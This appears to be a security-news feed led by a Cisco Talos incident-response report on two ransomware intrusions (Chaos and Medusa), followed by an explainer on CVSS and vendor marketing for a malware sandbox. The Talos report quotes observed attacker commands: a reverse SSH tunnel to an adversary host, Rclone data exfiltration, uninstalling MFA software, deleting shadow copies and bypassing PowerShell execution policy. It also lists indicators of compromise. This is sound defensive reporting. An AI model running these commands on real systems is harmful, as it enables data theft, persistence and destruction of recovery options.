Talos IR ransomware engagements and the significance of timeliness in incident response

  • Cisco Talos routinely responds to ransomware engagements where the impact could have been mitigated or wholly prevented if the victim organization had initiated remediation efforts earlier in the attack lifecycle. The significance of early intervention in ransomware attacks is particularly exemplified by two recent Talos Incident Response (Talos IR) ransomware engagements. 
  • In one incident, the victim engaged Talos IR immediately after discovering malicious activity alerts. Talos IR worked swiftly to combat additional malicious activity and prevented the execution of any encryption in the environment. 
  • Conversely, in a second incident, the victim ignored alerts of malicious activity and did not contact Talos IR until after the ransomware binary began to execute. Talos IR was then not provided network access for analysis for over a day, during which time the actors achieved nearly 100% host encryption. 
  • While there are many factors that can impact the success and severity of a ransomware attack, such as an actor’s sophistication and advanced tooling, close similarities between these two ransomware engagements led us to negate that these variables significantly influenced the disparate outcomes between these two attacks. 

Introduction 

Talos IR ransomware engagements and the significance of timeliness in incident response

As ransomware threat actors continuously decrease their dwell time — here defined as the duration between initial access and encryption — it is increasingly imperative to be mindful of timeliness in incident response engagements (Infosecurity Magazine, CyberScoop, Orca, ThreatDown). Early intervention and remediation can significantly mitigate or even wholly prevent repercussions of ransomware attacks, such as financial loss, reputational damage and legal repercussions, as exemplified by a comparison of two recent Talos IR engagements.

In both these cases, the threat actors leveraged similar tools and tactics, techniques and procedures (TTPs) and the victim was alerted to suspicious activity prior to ransomware execution, yet one engagement resulted in 0% network encryption while the other victim experienced nearly 100% encryption.

Talos assesses that encryption occurred due to several time delays at pivotal moments. First, Talos was not employed to start an IR engagement until after the ransomware binary was executed, despite early warnings, which allowed the actor to initiate encryption. Then, Talos was provided network access over 30 hours after the engagement began, during which time the actors obtained widespread encryption. For context, according to Talos data, many ransomware variants can seize complete control of a network in just 24-48 hours after initial access. Furthermore, these delays also allowed the threat actor to employ defensive measures that severely limited Talos’ ability to retroactively analyze system logs, a crucial step toward remediating the threat and hardening the network.

Description of attack lifecycles  

Engagement 1: Data theft without encryption 

In late April, Chaos ransomware affiliates gained an initial foothold into a victim environment via social engineering. They sent a flood of spam emails to a single user, then contacted the user in Microsoft Teams masquerading as IT support. During the Microsoft Teams session, the adversary guided the user to launch Microsoft Quick Assist and enter their credentials into an unknown login page, which ultimately provided access to the account. That same day, the victim was alerted to the security breach and engaged Talos IR to mitigate the threat, allowing Talos IR to review activity logs before the adversary could completely delete or modify them. 

The affiliates relied heavily on living-off-the-land binaries (LoLBins) and dual-use tools to conduct post-compromise activity and leveraged Impacket’s “atexec.py” module to execute commands remotely, specifically leveraging the Task Scheduler service. They began exploring the victim’s environment using Windows command line utilities like “ipconfig /all” to list network connections, “nltest /dclist” to list the domain controllers (DCs) within Active Directory (AD) and “quser.exe” to query information about user sessions. We also observed multiple outbound connections to adversary-controlled IP addresses using OpenSSH, an open-source suite of secure networking utilities that provide encrypted communication channels to create a reverse proxy SSH connection.

C:WindowsSystem32OpenSSHssh.exe -R :12840 -N REDACTED-p 443 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no

To move laterally within the environment, the adversary used Microsoft Remote Desktop and Advanced IP Scanner to obtain access to new accounts and maintained persistence by changing account passwords to lock users out.  

Notably, the actors used multiple remote monitoring and management (RMM) applications on different system tiers (e.g., workstations, servers and DCs) to ensure persistent remote access across multiple phases of the operation and to perform slightly different functions: 

  • Microsoft Quick Assist socially engineered the victim to install the tool for initial access. 
  • AnyDesk was likely the primary method of remote access as it was found on a majority of compromised systems. 
  • OptiTune was leveraged to deploy ScreenConnect RMM on a number of hosts. 
  • SplashTop was leveraged to enumerate activities on at least one host. 

They also took precautionary measures to evade detection, like uninstalling Duo from the host:

C:WINDOWSsystem32cmd.EXE, /c, wmic, product, where, name=Duo Authentication for Windows Logon x64, call, uninstall, /nointeractive:

A renamed Rclone executable was ran via command line to copy files from a network share:

wininit.exe, copy, --max-age, 1y, --exclude, *{psd,7z,mox,pst,FIT,FIL,MOV,mdb,iso,exe,dll,wav,png,db,log,HEIC,dwg,tmp,vhdx,msi}, \REDACTEDdata, REDACTED/data, -q, --ignore-existing, --auto-confirm, --multi-thread-streams, 25, --transfers, 15, --b2-disable-checksum, -P

Finally, just hours after initial access, the adversary launched the script “backup.sh”, a normal process found on ESXi hosts. Talos IR suspects the adversary leveraged the script to deliver the ransomware executable. We observed attempts to encrypt data on the victim’s VPN that were ultimately unsuccessful.

Engagement 2: Nearly 100% encryption 

In the second engagement, the victim ignored alerts from Cisco’s Managed Detection and Response (MDR) of malicious activity and did not contact Talos IR until after the Medusa ransomware binary began to execute. Then, Talos IR was not provided network access for analysis for over a day, during which time the actors achieved nearly 100% host encryption.

A retroactive analysis of the limited logs that remained after encryption revealed the actors similarly relied on dual-use tools. For remote access they used SimpleHelp, a legitimate RMM tool that is commonly abused by ransomware actors and, since January 2025, has been routinely exploited for path traversal (CVE-2024-57727). Talos IR also observed several remote incoming desktop connections from suspicious IP addresses, beacon activity from the commonly abused Brute Ratel C4 (BRC4) red teaming tool, and Windows APIs invoked that could be leveraged for data collection:  

  • Getnativesysteminfo determines the underlying hardware architecture and characteristics of a system, including the type of processor, number of processors and memory page size. 
  • Telemetry:api_invoke is the invocation of a Telemetry API. Attackers may monitor or trigger api_invoke events to discover what APIs are available, which users or services call which APIs and which cloud services are used, leveraging corresponding “telemetry:api_invoke” logs for environment enumeration. 
  • Bcryptgeneratesymmetrickey generates keys for AES decryption.

The adversary established command and control (C2) using JWrapper, a component of SimpleHelp that is often used by IT support and therefore may not be identified as malicious. JWrapper can also be leveraged to stealthily execute files and exfiltrate data, as it is designed to package Java applications into native executable formats for Windows, macOS and Linux. In this attack, the actors used it to execute a file that disabled the User Access Control in the registry by setting the Windows PromptOnSecureDektop record to false:

C:ProgramDataJWrapper-Remote AccessJWrapper-Remote Access Bundle-00112084494JWrapperTemp-1745261021-3-appbin windowslauncher.exe  
MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystemPromptOnSecureDesktop

JWrapper was also likely used to exfiltrate data:

C:ProgramDataJWrapper-Remote AccessJWrapper-Remote Access Bundle-00112084494JWrapperTemp-1745261021-3-appbinwindowslauncher.exe

The actors gained unauthorized access to remotely read and modify files within the System32 folder, a critical part of the Windows OS containing essential files needed for the system to function properly, and attempted to delete volume shadow copies from the folder, a common tactic to inhibit data recovery:

C:WindowsSystem32vssadmin.exe 'delete' 'shadows' '/shadow={5aa57685-c258-4396-b702-6722ab58e603}

They also executed Impacket in the System32 folder via PsExec remote copy and execution:

C:Windowssystem32services.exe, C:Windowssystem32msiexec.exe /V, C:Windowssyswow64MsiExec.exe -Embedding 27A094D718378410D2002AE3023D3731 E GlobalMSI0000

Analysis

Talos IR assesses that victim response time was the dominant factor that caused the discrepancy in impact. All other factors were incredibly similar, such as the actor’s level of sophistication, the victims’ endpoint security and Talos IR’s response. In both attacks, the affiliates displayed a similar level of sophistication in their tools, heavily using LoLBins and dual-use tools throughout the attack lifecycle. Examples include shared use of Msiexec, WMIC and PowerShell LoLBins and legitimate RMM tools. The actors also both used Impacket to execute commands remotely over SMB or WMI without deploying new payloads and used ADMIN$ administrative shares to propagate malware. A more sophisticated actor may have opted to use a custom malware, similar to the recently discovered Betruger backdoor, which is rarely seen in ransomware attacks.

In both cases, the actors also used similarly sophisticated TTPs to obtain widespread network access. They attempted to evade detection and analysis by deleting or modifying files, logs, and tools, and they were able to compromise the victims’ System32 folder and administrative accounts.

While Talos IR acknowledges that there are a few minor differences between these two engagements, these would not indicate a significant disparity. For example, the actors used different paid legitimate software to scan IPs and different RMM tools, but this would not have played any significant role in the impact to the victim.

We also observed that both victims had a similar flaw in endpoint hygiene by using the outdated PowerShell version 1.0 that was exploited by both threat actors. PowerShell 1.0 lacks several critical security features present in later iterations, making it difficult to detect and analyze malicious activity. For instance, the PowerShell 1.0 execution policy can be easily bypassed using inline execution “powershell.exe -ExecutionPolicy Bypass” or by modifying policy values in memory or the registry. This means scripts can be run without being digitally signed or verified, a common vector for ransomware payloads. Additionally, PowerShell 1.0 does not support Constrained Language Mode (CLM), which in later versions restricts access to .NET classes and APIs that can be exploited for lateral movement or privilege escalation. Without CLM, an attacker gains unrestricted access to the full breadth of PowerShell’s capabilities, including registry manipulation, WMI queries, COM object interaction and raw .NET assembly loading — all of which can be used to establish persistence or elevate privileges.

Finally, both victims received notifications of malicious activity prior to ransomware execution and, once the victims chose to engage Talos, we provided the same level of assistance. 

Timely log analysis enables quick recovery 

Early engagement with one of the victims and continued communication throughout allowed Talos IR to access the system logs before they could be deleted or modified, which likely helped the victim avoid encryption. Logs are a crucial component of remediating ransomware engagements for many reasons: 

  • Identifying weaknesses in network security that the actor exploited so they can be fixed 
  • Understanding what data was compromised so the victim can understand the potential fallout and notify the affected customers 
  • Establishing a baseline to help easily identify anomalies that indicate suspicious behavior (particularly important considering many ransomware affiliates leverage legitimate tools) 
  • Identifying adversary’s routine tools and TTPs to know how to identify future malicious activity, where to place detection systems to prevent future malicious activity and potentially attribute the activity to a particular actor 
  • Determining the actor’s goal (e.g., financial theft or espionage) to protect data the actor is likely trying to access 
  • Observing a clear path indicating a certain target will be compromised, or viewing failed attempts at a compromise, to preemptively harden the target 

While Talos IR provided some similar remediation recommendations for each victim due to overlaps in activity, the victim that waited to engage Talos IR received more general recommendations because they had limited logs to review, preventing Talos from understanding the full scope of malicious activity that occurred and how the adversary was able to compromise their network.

 

Recommendations based on limited access to logs 

Tailored recommendations  
based on logs 

Protect against malicious use of RMM software 

Only allow RMM software that is allowed by the company. All other RMMs should be blocked. 

Based on malicious SSH remote connection, make sure malicious IPs are blocked. Also consider blocking SSH at the firewall level. 

Secure passwords 

Conduct a full password reset for all accounts, including all privileged accounts, service accounts, user accounts and local accounts. 

Adversaries had access to hosts, which gave them access to the unencrypted data stored in their browsers. To help prevent this vulnerability in the future, implement GPOs to disable users from storing credentials and PII in browsers. 

Bar the adversary from moving laterally 

No recommendations provided due to limited visibility 

Consider migrating to Entra ID instead of the hybrid AD approach as this would have helped prevent the adversary’s lateral movement in the environment. 

Recommendations 

  • Raise awareness of phishing and social engineering. Given ransomware actors’ proficiency in using a wide array of techniques to obtain initial access, user education is a key part of spotting phishing attempts, countering MFA bypass techniques and knowing where to report unauthorized access attempts.  
  • Monitor and prevent unnecessary and/or unauthorized use of system administration tools, such as PowerShell, and adhering to zero trust principles. Restrict access to employees who need these for legitimate business purposes. Use of these tools should be logged and audited. 
  • Protect logs from modification or deletion. Consider creating service control policies (SCP) for cloud-based resources to prevent users or roles, across the organization, from being able to access specific services or take specific actions within services. For example, the SCP can be used to restrict users from being able to delete logs, update virtual private cloud (VPC) configurations and change log configurations. Additionally, log process execution events and deploy Sysmon to enhance logging capabilities on Windows devices. 
  • Restrict the use of RMM and dual-use tools. Review logs for execution of RMM software to detect abnormal use, such as RMM software only being loaded in memory and block both inbound and outbound connections on common RMM ports and protocols at the network perimeter. 
  • Employ data loss prevention (DLP) strategies to prevent unauthorized disclosure or leakage. These include data classification policies, data handling policies, user awareness and training and DLP software that can identify and block unauthorized data transfer attempts.

Protections   

Chaos    

Unix.Malware.Chaos-6474834-0   

Signature Name: Unix.Malware.Chaos-6474902-0   

45975  

Medusa   

63929, 63928   

300998   

33058-33060   

Signature Name: Andr.Ransomware.Medusa-10033530-0   

Signature Name: PUA.Win.Tool.BestCrypt-10033531-0   

Signature Name: Win.Ransomware.Medusa_Note-10033532-0

Indicators of compromise (IOCs) 

Chaos    

Filename  

SHA256  

Status/Description  

Wavesor.exe  

19ab3c8645d6806ae8a1dad707a86aba344a48d1612aeb5aa145f96ac0e24a03   

Malware that can be used to capture critical information 

wininit.exe  

5540f27f12db5a9e954727079665a282f905a0be787b76d798ca79a318d197f5  

Renamed version of rclone  

Advanced_IP_Scanner_2.5.4594.1.exe  

26d5748ffe6bd95e3fee6ce184d388a1a681006dc23a0f08d53c083c593c193  

IP scanner used for discovery  

screensaver.exe  

87b3e3462263d7d42dea2bac6c3144181bab22092276f527a94a33af473066d5  

ScreenConnect 

otservice.exe  

b5c63f895d27d0572289cb49058ea83b1e49c46a62ca51b4ab44d119111594a4  

OptiTune RMM used to deploy ScreenConnect  

supportcenter.exe  

1ede8d91db625a605535488d1c36a5ea7ba3950194cabe7664ffa7ed6a9aab45  

OptiTune RMM  

bvscript.exe  

9d2fe8a4a229ed2990e33a0330a00c03a415435c3cabd9a42dd882673522bee4  

OptiTune RMM Bravura Script Host tool  

otpowershell.exe  

10a87144386b2869d1bbc40e50f6960d4eb4316d1fd1c1df8708361a7b837b98  

OptiTune PowerShell tool  

remoteservice.exe  

4b6ff966ec6509e86c4a1cbf71d71bf434e08e0aae097a57015ad493db4a3912  

OptiTune Remote Service tool  

realtimeagent.exe  

6a3072a2367329b564c9bf77302a5fbf66673fb471c22fc56a12e901c4d90477  

OptiTune Real Time Agent tool  

advanced_ip_scanner.exe  

4b036cc9930bb42454172f888b8fde1087797fc0c9d31ab546748bd2496bd3e5  

IP scanner used for discovery  

goodsync.exe  

8127614d1906befc82ebc75fc0992e7dbad64ed2233fe316df611bf89ac4df2e  

Data exfiltration tool  

screenconnect.exe  

05016485b683ef6d40bfd805702924909197ee2483a66ffc8a22dc03e4891045  

Unknown executable placed on host ‘PKIWEBSVR’. 

syncro.installer.exe  

845f4d73a0d96898535593c411d924d8c8c3af1dd3ead5f824242bb841d53c8e  

Syncro RMM installer  

setuputil.exe  

1837087e75de428c18acec7f2ef7576752396a3a1ef15450230734e9ee194b28  

Splashtop Streamer installer  

anydesk.exe 

6ccea6a959128112613d7a82c067f8ccc78f05f1f8f47348fc9fecf269f0f21a 

Malicious use of AnyDesk  

QuickAssist.exe ms-quick-assist   

8f67faad634acf0f2971caf8b7ac96e8f05de795b74feec8b82ea168b7be820b  

Executable that “patient zero” was socially engineered into running 

splashtop.exe 

03a613c62ae7470e70e0197ea5133625308dc2ac2c5574608d2b6e20c8f94015 

Splashtop 

splashtop_sos.exe 

61f281c24846d311031521d13c933c42b33c7283d425456f00cf0ef3ffb04863 

Splashtop 

 

Domain, URI Path, or IP Address  

Status/Description  

144.172.103[.]42  

Adversary controlled IP address used to establish a reverse proxy SSH connection  

45.61.134[.]36  

Adversary controlled IP address used to establish a reverse proxy SSH connection 

civicoscolombia[.]com  

Domain with malicious reputation and signs of potential data exfiltration  

104.21.44[.]57’  

IP for malicious domain civicoscolombia[.]com  

Medusa   

Filename  

SHA256  

Status/Description  

windowslauncher.exe  

 remote access.exe  

11e7f8b671ed39497c8561b0ecd13496080681c21a457d6079817a90de553bf1’  

SimpleHelp Remote Access Client  

storm.exe  

ee6d24410a8cf31d672d2a47466b76ad287c7ba016d3711490f0f607b1dc0be3  

SimpleHelp Remote Access Client  

psexecsvc.exe  

cc14df781475ef0f3f2c441d03a622ea67cd86967526f8758ead6f45174db78e  

Microsoft Sysinternals PsExec  

Remote AccessLauncher.exe  

1e43e202a6e5d3059c3901a63fd69b32a7c0719c9f4c4f592a71c85e08e5d188  

SimpleHelp Remote Access Client  

session_win.exe  

6e5f719d4c319e6aab1440f149d8d1dcb512a8f558b62311a0a5d5af366074ff  

SimpleHelp Remote Access Client  

ipscan-win64-3.0-beta6.exe  

8c1ec962a5e01d8717f6391af96c973600797c5285bcac1ac939a8d59e40e64e  

Angry IP Scanner  

remote access service.exe  

dfee42845dd0ba873411df0ea1a917a7f2c1ddd9c024d325ce76aea90a9c9c51  

 

733fc3b203e9b46d1dd8bfdeea3efd2adc569ef6806bdc15b077623670ad52e1  

 

34df37643dab68d3d3b36c415b6b9fd1842c475c088007081ee613a780fd1c2c  

SimpleHelp Remote Access Client 

winpty-agent64.exe  

586a2d7d3092b364db3cbb5a7dbc83cf7ef233338c4172c1bae6587f8b374cab  

SimpleHelp utility to manage terminal connections                      

 

Domain, URI Path, or IP Address  

Status/Description  

213.183.63[.]41  

Command and control SimpleHelp remote access IP address  

89.36.161[.]17  

Command and control SimpleHelp remote access IP address  

143.110.243[.]154  

Suspected data exfiltration IP address  

Cisco Talos Blog – ​Read More

Unmasking AsyncRAT: Navigating the labyrinth of forks

ESET researchers map out the labyrinthine relationships among the vast hierarchy of AsyncRAT variants

WeLiveSecurity – ​Read More

What you need to know about CVSS to protect your IT assets

This year marks the 20th anniversary of the Common Vulnerability Scoring System (CVSS), which has become a widely accepted standard for describing software vulnerabilities. Despite decades of use and four generations of the standard — now at version 4.0 — CVSS scoring rules continue to be misused, and the system itself remains the subject of intense debate. So, what do you need to know about CVSS to effectively protect your IT assets?

The CVSS Base Score

According to its developers, CVSS is a tool for describing the characteristics and severity of software vulnerabilities. CVSS is maintained by the Forum of Incident Response and Security Teams (FIRST). It was created to help experts speak a common language about vulnerabilities, and to facilitate automatic processing of data on software flaws. Almost every vulnerability published in major vulnerability registries like CVE, EUVD, or CNNVD includes a severity assessment based on the CVSS scale.

An assessment typically consists of two main parts:

  • A numerical rating (CVSS score), which shows how severe the vulnerability is on a scale from 0 to 10. A score of 10 means it’s an extremely dangerous, critical vulnerability.
  • A vector, which is a standardized text string that describes the vulnerability’s key characteristics. This includes details like whether it can be exploited remotely over a network or only locally, if elevated privileges are needed, how complex it is to exploit, and what aspects (such as availability, integrity, or confidentiality) of the vulnerable system are affected by exploitation.

Here’s an example using the highly severe and actively exploited vulnerability CVE-2021-44228 (Log4Shell): Base Score 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Let’s break that down: the attack vector is network-based, attack complexity is low, privileges required: none, user interaction isn’t required, the scope indicates the vulnerability impacts other system components, and the impact on confidentiality, integrity, and availability is high. Detailed descriptions of each component are available in the CVSS 3.1 and CVSS 4.0 specifications.

A crucial part of the CVSS system is its scoring methodology — also known as the calculator, and available for both 4.0 and 3.1. By filling in all the vector components, you can automatically get a numerical criticality score.

The original CVSS calculation methodology included three metric groups: Base, Temporal, and Environmental. The first group covers the fundamental and unchanging characteristics of a vulnerability, and forms the basis for calculating the CVSS Base Score. The second group includes characteristics that can change over time — such as the availability of published exploit code. The third group is designed for internal organizational use to account for context-specific factors like the vulnerable application’s scope or the presence of mitigating security controls in the organization’s infrastructure. In CVSS 4.0, the Temporal metrics have evolved into Threat metrics, and a new group of Supplemental metrics has been introduced.

Here’s how the metrics are interconnected. Software vendors or cybersecurity companies typically assess the Base criticality of a vulnerability (referred to as “CVSS-B” in the 4.0 specification). They also often provide an assessment related to the availability and public disclosure of an exploit (CVSS-BT in 4.0, and Temporal in 3.1). This assessment is a modified Base Score; therefore CVSS-B can be higher or lower than CVSS-BT. As for the Environmental score (CVSS-BTE), it’s calculated within a specific organization based on the CVSS-BT, with adjustments made for their unique conditions of using the vulnerable software.

The Evolution of CVSS

The first two versions of CVSS, released in 2005 and 2007, are hardly used today. While you might still find older CVSS scores for modern vulnerabilities, CVSS 3.1 (2019) and CVSS 4.0 (2023) are the most common scoring systems. However, many software vendors and vulnerability registries aren’t in a rush to adopt version 4.0, and they continue to provide CVSS 3.1 scores.

The core idea behind the first CVSS version was to quantify the severity of vulnerabilities via a scoring system — with an initial separation into Base, Temporal, and Environmental metrics. At that stage, the textual descriptions were loosely formalized, and the three groups of metrics were calculated independently.

CVSS 2.0 introduced a standardized vector string and a new logic: a mandatory and unchangeable Base score, a Temporal score calculated from the Base score but accounting for changing factors, and an Environmental score used within specific organizations and conditions derived from either the Base or Temporal score.

Versions 3.0 and 3.1 added the concept of Scope (impact on other system components). They also more precisely defined parameters related to required privileges and user interaction, and they generalized and refined the values of many parameters. Most importantly, these versions attempted to solidify the fact that CVSS measures the severity of a vulnerability — not the risks it creates.

In version 4.0, the creators aimed to make the CVSS metric more useful for business-level assessments of how vulnerabilities impact risk. This is still not a risk metric, though. Attack complexity was split into two distinct components: attack requirements and attack complexity. This highlights the difference between the inherent engineering difficulty of an attack and the external factors or conditions necessary for the attack to succeed. In practical terms, this means a flaw that requires a specific, non-default configuration on the vulnerable product to be exploited will have higher attack requirements and, consequently, a lower overall CVSS score.

The often-misunderstood Scope metric, which simply offered “yes” or “no” options for “impact on other components”, has been replaced. Developers have introduced the clearer concept of “subsequent systems”, which now specifies what aspect of their operation the vulnerability affects. Additionally, a range of supporting indicators has been added — such as the automatability of an exploit and the impact of exploitation on human physical safety. The formulas themselves have also undergone substantial revisions. The influence of various components on the numerical threat score has been re-evaluated based on a vast database of vulnerabilities and real-world exploitation data.

How CVSS 4.0 is changing vulnerability prioritization

For cybersecurity professionals, CVSS 4.0 aims to be more practical and relevant to today’s realities. We’re facing tens of thousands of vulnerabilities — many of which receive a high CVSS score. This often leads to them being automatically flagged for immediate remediation in many organizations. The problem is, these lists are constantly growing, and the average time to fix a vulnerability is nearing seven months.

When vulnerabilities are re-evaluated from CVSS 3.1 to CVSS 4.0, the Base Score for defects with a severity between 4.0 and 9.0 tends to slightly increase. However, for vulnerabilities that were considered critically severe in CVSS 3.1, the score often remains unchanged or even decreases. More importantly, while Temporal metrics had little impact on a vulnerability’s numerical rating before, the influence of Threat and Environmental metrics is now much more significant. Orange Cyberdefense conducted a study to illustrate this. Imagine a company is tracking 8000 vulnerabilities, and their IT and security teams are required to fix all defects with a Base CVSS score above 8 within a specified timeframe. What percentage of these 8000 real-world vulnerabilities would fall into that category — with or without considering exposure of the exploit to the public (Temporal/Threat adjustment)? The study found that CVSS 4.0, in its base version, assigns a score of 8 or higher to a larger percentage of vulnerabilities (33% compared to 18% in version 3.1). However, when adjusted for the availability of exploits, this number drops significantly — leaving fewer truly critical flaws to prioritize (8% versus 10%).

Critical, High, and everything in between

What’s the difference between a “critical” vulnerability and one that’s just plain dangerous? A text-based severity description is part of the specification — but it’s not always required in a vulnerability description:

  • Low Severity: 0.1–3.9
  • Medium Severity: 4.0–6.9
  • High Severity: 7.0–8.9
  • Critical Severity: 9.0–10.0

In practice, many software vendors take a creative approach to these text descriptions. They might modify the names or incorporate their own assessments and factors not included in CVSS. A case in point is June’s Microsoft Patch Tuesday — specifically CVE-2025-33064 and CVE-2025-32710. The first is described as “Important” and the second as “Critical”, yet their CVSS 3.1 scores are 8.8 and 8.1, respectively.

Kaspersky official blog – ​Read More

Enterprise Plan: Boost SOC Performance, Reduce Business Risks with ANY.RUN

Editor’s note: The current article was originally published on April 10, 2024, and updated on July 15, 2025.

Modern cybersecurity teams face growing pressure: more threats, tighter SLAs, and less time to investigate. The difference between fast containment and a damaging breach often comes down to visibility, collaboration, and control. 

ANY.RUN’s Enterprise plan is a complete malware analysis plan built for organizations that can’t afford to miss a threat. It combines interactive sandboxing, robust privacy settings, centralized team management, and flexible integrations.  

It provides SOCs with the full picture of every threat, helping them respond quickly and accurately, no matter the size or sector of your organization. 

Integrate ANY.RUN in your SOC
Contact us for a quote or personalized demo 



Contact us


Why Leading Security Teams Choose ANY.RUN’s Enterprise Plan 

ANY.RUN’s Interactive Sandbox is used by SOC teams for malware and phishing analysis 

Enterprise gives security teams all the essentials in a single, unified solution—from threat visibility and secure collaboration to automation and ecosystem integration. With a setup designed to fit into existing workflows, it removes bottlenecks and accelerates decision-making at every stage of investigation. 

The results speak for themselves: 

  • 90% of companies report higher detection rates after adopting ANY.RUN 
  • 95% say they resolve investigations significantly faster 
  • 80% of Fortune 100 companies rely on ANY.RUN in their security operations 
  • Trusted by 15,000+ organizations across finance, telecom, retail, government, and healthcare 

ANY.RUN helps teams cut through alert noise, validate threats faster, and stay ahead of what’s coming next. 

☝ Enterprise Plan:
  • Is for SOC teams and MSSPs
  • Offers all features, including teamwork and Automated Interactivity
  • Available for integration via API and SDK
  • Covers 5 or more seats

Real-World Success Stories: How Security Teams Win with ANY.RUN Enterprise 

ANY.RUN’s Enterprise plan is trusted by leading organizations to solve real problems, streamline operations, and stay ahead of threats. 

From managed security providers to financial institutions, more than 15,000 organizations around the world use Enterprise to improve visibility, accelerate response, and strengthen their security posture. 

Expertware Cuts Investigation Time by 50% with ANY.RUN Enterprise 

Expertware, a leading European IT consultancy, needed to accelerate investigations, reduce manual overhead, and deliver faster results to clients. With Enterprise, they achieved a 50% reduction in malware investigation turnaround time

By replacing time-consuming manual setups with interactive sandboxing, Expertware improved visibility into complex threats, streamlined collaboration across their SOC, and scaled operations without adding overhead. 

Besides the faster investigation, Expertware achieved: 

  • Greater SOC efficiency: Interactive analysis and shared reports improved collaboration and reduced rework 
  • Deeper visibility: Full insight into multi-stage and fileless attacks, from macro execution to C2 communication 
  • Stronger client outcomes: Faster, clearer reporting helps clients respond before threats escalate 

Investment Bank Improves SOC Efficiency and Stops Ransomware with ANY.RUN Enterprise 

A Brussels-based investment bank adopted ANY.RUN’s Enterprise plan to overhaul its overloaded cybersecurity operations. Facing constant phishing and ransomware threats, their lean SOC team needed a solution that could speed up investigations, enhance visibility, and reduce manual work. 

With ANY.RUN, they replaced slow, manual triage processes with interactive sandboxing and automated analysis, allowing them to detect and contain attacks faster, without adding headcount. 

The combination of speed and knowledge allowed us to identify and prevent cyber attacks better than ever before.

Head of Cybersecurity, EU-based investment bank

Key improvements after adopting the Enterprise plan: 

  • Faster triage and response: Analysts process alerts twice as fast using automated sandbox submissions and interactivity 
  • Smarter planning and decision-making: Deeper behavioral insights help the team prioritize threats more effectively 
  • Prevented major ransomware incident: A suspicious supplier email was detonated in the sandbox, revealing ransomware and saving the company from significant financial and reputational damage 

ANY.RUN became a central part of their modernized SOC, delivering speed, visibility, and control without increasing complexity. 

Privacy: Keep Investigations Secure and Under Control 

In threat investigations, privacy plays an important role. A single public task launched by mistake can expose sensitive data, damage trust, or break compliance. The Enterprise plan helps your team avoid those risks with flexible private analysis options, role-based visibility controls, and secure access through SSO. 

Flexible Private Analysis Quotas 

Enterprise customers can choose the model that fits their team structure best: 

  • Unlimited private analyses per user with a per-user pricing model 
  • Unlimited users with a per-analysis pricing model 

This flexibility makes sure your investigations stay private, without limiting your team’s ability to scale or collaborate. 

Granular Privacy Controls 

Manage privacy in your team settings

You can control each user’s access to the sandbox, including the default privacy level of their analyses; whether tasks are visible only to the user, shared with the team, or accessible via a link. Team masters can define what analysts are allowed to share and ensure sensitive investigations aren’t exposed by mistake. 

In large or distributed teams, one misconfigured setting can lead to accidental data leaks. Granular privacy controls help reduce that risk by enforcing visibility rules at the user level, keeping your analysis environment secure without slowing your team down. 

Let us show you how ANY.RUN can help your SOC team – book a call with us ⬇

Single Sign-On (SSO): Simpler Access, Stronger Control 

For busy security teams, managing multiple logins can slow things down, and increase risk. With Single Sign-On (SSO) in the Enterprise plan, your team can log in to ANY.RUN using the same credentials they use across the rest of your organization. 

That means: 

  • Fewer login issues and less time wasted on password resets 
  • Stronger access control, especially as your team grows 
  • Easier onboarding and offboarding for analysts and contractors 

SSO helps your SOC stay efficient and secure, giving every team member fast, reliable access to the sandbox, without extra friction. It also reduces the chance of human error, making it easier to stay compliant with internal policies and external standards. 

Automated Interactivity: Streamline Analysis for Faster Response

See a video recording of the analysis performed by Automated Interactivity

Automated Interactivity, powered by machine learning, enables security teams to automate file/URL analysis by letting the sandbox simulate human actions to outsmart evasion tactics like CAPTCHAs and redirects. Available exclusively in Enterprise plan, it gives a massive boost to SOC efficiency by automating detonation of attacks and accelerating threat detection.

It identifies and detonates malicious content, such as email attachments, payloads inside archives, URLs in QR codes. Thanks to this feature, your SOC team can reduce workload, improve the detection rate and alert processing capabilities, while focusing on critical incidents only.

This sandbox has provided features we didn’t have previously and helps to make the team more efficient

Joel P., Enterprise (> 1000 emp.)

API/SDK: Integrate ANY.RUN for Faster SOC Workflows 

ANY.RUN app for IBM QRadar SOAR 

The Enterprise plan gives your team full access to API and SDK integrations, so you can embed ANY.RUN directly into your existing workflows, automate routine tasks, and enrich investigations with real-time behavioral data. 

Whether you use a SIEM, SOAR, or case management platform, ANY.RUN connects seamlessly, helping analysts cut down on manual effort and focus on what matters most. 

You can set up integration with other security vendors with ease

One of our latest integrations is with IBM QRadar SOAR, a popular platform for incident response. With ANY.RUN’s official app, teams can: 

  • Launch sandbox analyses directly from SOAR playbooks 
  • Enrich cases with fresh IOCs and behavioral insights 
  • Automate repetitive tasks to reduce Mean Time to Respond (MTTR) 

Setup takes minutes; just plug in your API key and get started. 

With integrations like this, ANY.RUN becomes a natural part of your security workflow, helping your team move faster, stay aligned, and act with greater precision. 

Teamwork: Smarter Collaboration for Analysts 

Even the most advanced tools fall short when teams can’t work together effectively. In many SOCs, analysts work in silos, communication breaks down, and duplicated work or missed alerts slow down investigations. 

Team management displayed inside ANY.RUN sandbox

The Teamwork feature in Enterprise makes collaboration seamless, whether your team sits in the same room or operates across time zones. Analysts can join a shared workspace, while team leads assign roles, track progress, and manage licenses, all from one central interface. 

  • Faster coordination across analysts, team leads, and managers 
  • Clear task ownership and role definitions to avoid confusion or rework 
  • Real-time supervision for team leads, without disrupting workflow 
  • Scalable team structure, ready to support fast-growing SOCs 
Track team members’ productivity

When every analyst knows what to focus on, and team leads can oversee without micromanaging, you reduce delays, avoid duplication, and build a stronger response process. 

ANY.RUN is used by companies of different sizes and across numerous industries

Other Enterprise-Grade Capabilities for Deeper, More Accurate Investigations 

The sandbox offers advanced threat analysis capabilities across Windows, Linux, and Android

The Enterprise plan gives your analysts the technical depth and flexibility to run more realistic, multi-stage investigations and uncover even the most evasive threats. 

  • Ensure full sandbox coverage without feature limitations: Enterprise users get access to 100% of sandbox functionality, unlocking every detection layer and configuration option available. 
  • Investigate advanced malware without time pressure: With 1,200-second VM timeout, your team has the time needed to observe full execution chains, from initial dropper to final payload. 
  • Reveal location-based behavior and evasion techniques: Use residential proxy and locale selection to simulate real-world environments and detect malware that hides its behavior under generic settings. 
  • Analyze threats across real-world environments: Run samples in Windows (11 64-bit, 10 32-bit, and Windows 10 64-bit for Developers, exclusive to Enterprise), Linux, and Android to detect OS-specific behavior and expand coverage across your attack surface. 
